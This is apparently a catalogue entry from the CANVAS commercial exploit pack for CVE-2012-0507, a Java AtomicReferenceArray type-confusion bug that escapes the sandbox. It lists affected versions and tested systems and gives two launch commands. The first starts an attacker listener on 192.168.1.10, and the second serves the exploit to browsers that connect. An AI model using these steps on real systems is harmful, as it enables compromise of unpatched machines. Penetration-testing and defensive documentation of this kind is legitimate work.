Name | java_AtomicReferenceArray |
CVE | CVE-2012-0507 |
Exploit Pack | CANVAS |
Description | Java AtomicReferenceArray Type Confusion Sandbox Bypass |
Notes | CVE Name: CVE-2012-0507
VENDOR: Sun
Notes: There is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class. When creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method does not properly check the object type being inserted. This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.

Affected versions:
- JDK and JRE 7 Update 2 and earlier
- JDK and JRE 6 Update 30 and earlier
- JDK and JRE 5.0 Update 33 and earlier
- SDK and JRE 1.4.2_35 and earlier

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1

To run from command line, first start the listener (UNIVERSAL):
    python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
    python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)

References:
- http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
- http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

Date public: 02/14/2012 |